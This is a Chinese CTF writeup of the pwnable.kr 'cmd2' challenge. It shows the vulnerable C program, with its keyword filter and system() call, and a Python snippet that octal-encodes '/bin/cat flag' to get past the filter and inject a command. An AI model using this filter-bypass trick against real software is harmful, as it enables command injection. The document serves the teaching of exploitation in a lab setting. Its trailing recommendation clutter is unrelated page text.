【W(wǎng)riteup】Pwnable.kr 0x0F cmd2

0x0F cmd2

題目描述

Daddy bought me a system command shell.
but he put some filters to prevent me from playing with it without his permission...
but I wanna play anytime I want!

ssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)

題目代碼

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
    int r=0;
    r += strstr(cmd, "=")!=0;
    r += strstr(cmd, "PATH")!=0;
    r += strstr(cmd, "export")!=0;
    r += strstr(cmd, "/")!=0;
    r += strstr(cmd, "`")!=0;
    r += strstr(cmd, "flag")!=0;
    return r;
}

extern char** environ;
void delete_env(){
    char** p;
    for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
    delete_env();
    putenv("PATH=/no_command_execution_until_you_become_a_hacker");
    if(filter(argv[1])) return 0;
    printf("%s\n", argv[1]);
    system( argv[1] );
    return 0;
}

題目分析

這道題比上一道題多過(guò)濾了很多東西,主要是把“/”過(guò)濾了思恐,就想辦法繞過(guò)沾谜。想了很久沒(méi)搞定,google了一下胀莹,發(fā)現(xiàn)可以用八進(jìn)制進(jìn)行繞過(guò)

解題步驟

from pwn import *
cmd = "/bin/cat flag"
print "\\"+"\\".join([oct(i) for i in ordlist(cmd)])
\057\0142\0151\0156\057\0143\0141\0164\040\0146\0154\0141\0147
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末基跑,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子描焰,更是在濱河造成了極大的恐慌媳否,老刑警劉巖,帶你破解...
    沈念sama閱讀 216,744評(píng)論 6 502
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件荆秦,死亡現(xiàn)場(chǎng)離奇詭異篱竭,居然都是意外死亡,警方通過(guò)查閱死者的電腦和手機(jī)步绸,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,505評(píng)論 3 392
  • 文/潘曉璐 我一進(jìn)店門掺逼,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái),“玉大人瓤介,你說(shuō)我怎么就攤上這事吕喘∽改牵” “怎么了?”我有些...
    開封第一講書人閱讀 163,105評(píng)論 0 353
  • 文/不壞的土叔 我叫張陵氯质,是天一觀的道長(zhǎng)募舟。 經(jīng)常有香客問(wèn)我,道長(zhǎng)病梢,這世上最難降的妖魔是什么胃珍? 我笑而不...
    開封第一講書人閱讀 58,242評(píng)論 1 292
  • 正文 為了忘掉前任,我火速辦了婚禮蜓陌,結(jié)果婚禮上觅彰,老公的妹妹穿的比我還像新娘。我一直安慰自己钮热,他們只是感情好填抬,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,269評(píng)論 6 389
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著隧期,像睡著了一般飒责。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上仆潮,一...
    開封第一講書人閱讀 51,215評(píng)論 1 299
  • 那天宏蛉,我揣著相機(jī)與錄音,去河邊找鬼性置。 笑死拾并,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的鹏浅。 我是一名探鬼主播嗅义,決...
    沈念sama閱讀 40,096評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼隐砸!你這毒婦竟也來(lái)了之碗?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 38,939評(píng)論 0 274
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤季希,失蹤者是張志新(化名)和其女友劉穎褪那,沒(méi)想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體式塌,經(jīng)...
    沈念sama閱讀 45,354評(píng)論 1 311
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡武通,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,573評(píng)論 2 333
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了冶忱。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片境析。...
    茶點(diǎn)故事閱讀 39,745評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡链沼,死狀恐怖缆八,靈堂內(nèi)的尸體忽然破棺而出奈辰,到底是詐尸還是另有隱情奖恰,我是刑警寧澤宛裕,帶...
    沈念sama閱讀 35,448評(píng)論 5 344
  • 正文 年R本政府宣布蛹屿,位于F島的核電站蜡峰,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏粥诫。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,048評(píng)論 3 327
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望沙合。 院中可真熱鬧绊率,春花似錦滤否、人聲如沸藐俺。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,683評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)滞伟。三九已至,卻和暖如春亩钟,著一層夾襖步出監(jiān)牢的瞬間清酥,已是汗流浹背蕴侣。 一陣腳步聲響...
    開封第一講書人閱讀 32,838評(píng)論 1 269
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留揩懒,地道東北人已球。 一個(gè)月前我還...
    沈念sama閱讀 47,776評(píng)論 2 369
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親棒坏。 傳聞我的和親對(duì)象是個(gè)殘疾皇子坝冕,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,652評(píng)論 2 354

推薦閱讀更多精彩內(nèi)容

  • Android 自定義View的各種姿勢(shì)1 Activity的顯示之ViewRootImpl詳解 Activity...
    passiontim閱讀 172,085評(píng)論 25 707
  • 背景 一年多以前我在知乎上答了有關(guān)LeetCode的問(wèn)題, 分享了一些自己做題目的經(jīng)驗(yàn)瓦呼。 張土汪:刷leetcod...
    土汪閱讀 12,743評(píng)論 0 33
  • 聚餐是一個(gè)左右為難的活動(dòng)喂窟,去,可以饕餮大餐央串,團(tuán)結(jié)群眾磨澡,但是又浪費(fèi)時(shí)間,叨叨逼逼质和。不去稳摄,錯(cuò)過(guò)美食,影響關(guān)系饲宿,還各種...
    律人閱讀 75評(píng)論 0 0
  • 具體教程網(wǎng)上一大堆厦酬,我只寫一下分割窗口吧,比較使用 1.橫著分: c-b " 2.豎著分 c-b % 3.其他有用...
    MiracleJQ閱讀 1,477評(píng)論 0 0
  • (2014-08-30 23:57:28) 繼續(xù)踐行讓大家講故事瘫想,讓大家傾聽的理念仗阅,今天的班會(huì),仍然主打講故事国夜。 ...
    羽觴yy閱讀 888評(píng)論 0 1